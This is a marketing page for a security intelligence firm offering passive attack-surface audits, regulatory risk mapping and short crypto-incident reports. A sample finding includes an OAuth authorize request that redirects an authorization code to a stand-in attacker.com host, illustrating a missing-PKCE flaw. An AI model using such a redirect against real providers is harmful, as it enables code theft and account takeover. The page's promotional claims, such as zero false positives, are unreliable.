Sovereign Intelligence Platform

FORENSIC
CAPITAL

What Others Miss

Right now, someone is mapping your infrastructure. We looked first.

Precision intelligence on systemic risk,
institutional attack surfaces,
and financial exposure — 48 hours.

NIS2DORAMiCAGDPRSOC2
Scroll
0 Signal Vectors
$0B Exposure Identified
168h Time to First Finding
0 False Positives — 2025
The asymmetry

Your security team has a perimeter.
We have no perimeter.

Traditional audits test what they can access.
We analyze what is publicly visible —
the same surface an attacker maps before you know they exist.

216 signal vectors. Every exposure. Before the conversation begins.

The question is not if.
It's when.

Finance · Crypto · Healthcare · SaaS Enterprise · HFT · DeFi · Critical Infrastructure

Six families.
Every surface.

We engage the full attack surface simultaneously —
infrastructure, supply chain, regulatory, and human vectors.

FAM-01
Infrastructure & Cloud

S3 exposure, cloud misconfiguration, certificate anomalies, BGP instability, subdomain takeover surface.

NIS2ISO 27001
FAM-02
Supply Chain

Third-party JS integrity, npm dependency confusion, vendor compromise, Tier-Critical dependency mapping.

DORANIS2
FAM-03
Authentication & Identity

OAuth misconfiguration, PKCE gaps, JWT confusion, SSO drift, credential exposure correlation.

GDPRSOC2
FAM-04
Web3 & On-Chain

ABI exposure, unlimited approval patterns, wallet drainer indicators, flash loan surface, oracle manipulation.

MiCAVARA
FAM-05
Regulatory Exposure

NIS2 Article 21 gaps, DORA ICT risk mapping, GDPR Article 32 assessment, MiCA security framework.

NIS2DORAMiCA
FAM-06
Threat Intelligence

Breach correlation, dark web monitoring, IP reputation, attacker infrastructure mapping, CVE exploit analysis.

ISO 27001SOC2

A finding that makes
the board act.

FC-2026-OS-00847 · Validated 2026-04-30 UTC · Ed25519 signed · Merkle anchored
High — CVSS 7.5
Finding

OAuth Authorization Code Interception via Missing PKCE Enforcement

AV:N/AC:H/PR:N
NIS2 · DORA
€10M+
CWE-636
Omega Score
74/100

The authorization endpoint accepts OAuth 2.0 flows without requiring PKCE, enabling authorization code interception in transit. Combined with absent state parameter validation, this creates a viable CSRF vector against all third-party applications relying on this provider.

GET /oauth/authorize?response_type=code &client_id=[CLIENT_ID] &redirect_uri=https://attacker.com/cb &scope=openid+profile HTTP/2 302 Found Location: https://attacker.com/cb?code=AUTH_CODE # No code_challenge required # State parameter not validated → CSRF viable

Under NIS2 Article 21, failure to implement current authentication best practices constitutes a reportable incident. Under DORA Article 30, this triggers mandatory third-party risk notification for all connected financial entities. Combined exposure: €10M+ regulatory liability.

Intelligence before
the conversation begins.

01 — Reconnaissance

Passive surface mapping

216 signal vectors. Exclusively public data. No credentials, no intrusion, no footprint on your systems. Zero interaction with internal infrastructure.

02 — Validation

Cryptographically signed proof

Every finding carries a reproducible proof-of-concept, an Ed25519 signature, and a Merkle anchor. Legally admissible. Zero false positives.

03 — Delivery

Board-ready in 48 hours

Executive summary, FAIR financial model, CVSS scoring, regulatory mapping, remediation roadmap. Delivered through a secure access portal. Not a PDF attachment.

First contact

We share a finding
before any engagement.

No pitch deck. No discovery call.
We send you one specific finding from your public surface first.
The data speaks. Then we talk.

We engage with a limited number of institutions annually.

marcus@forensic-capital.com

No forms. No demos. One email.

Request Engagement

Selective intake.
Institutional standards.

We assess a limited number of mandates annually.
Share your context — we respond within 48 hours.

No automated responses. No SDR calls.
A direct reply from the analyst — or nothing.

Intelligence, published.

One brief per week — anonymized findings, sector patterns, and signal analysis
drawn from live reconnaissance data. Cryptographically signed. Verifiable.
No vendor narrative. No paywall on briefs.

Published reports.

Post-incident forensic reconstruction. Every finding independently verifiable.

FC-001 · 2026-05-27
KelpDAO — DVN Threshold Bypass

LayerZero DVN requiredDVNCount=1 exploited. Single operator approved fraudulent cross-chain message. $292M exposure surface.

BridgeOracle$292M
FC-002 · 2026-03-10
Aave CAPO — Oracle Rate Cap Failure

wstETH/stETH CAPO snapshotRatio divergence drove $26M in liquidations. Configuration vulnerability in oracle rate mechanism.

OracleLending$26M
FC-003 · 2026-05-28
Resolv USR — AWS KMS Credential Compromise

AWS KMS key held by a GitHub contractor. $23.8M drained in ~80 minutes. Initial mint phase: 17 min. Cloud key management failure.

CloudKey Mgmt$23.8M
FC-004 · 2026-05-18
Verus Bridge — Cross-Chain Verification Exploit

checkCCEValues binding gap. $10 exploit cost, $11.58M extracted. 75% recovered via bounty. Third confirmed bridge verification class incident.

BridgeVerification$11.58M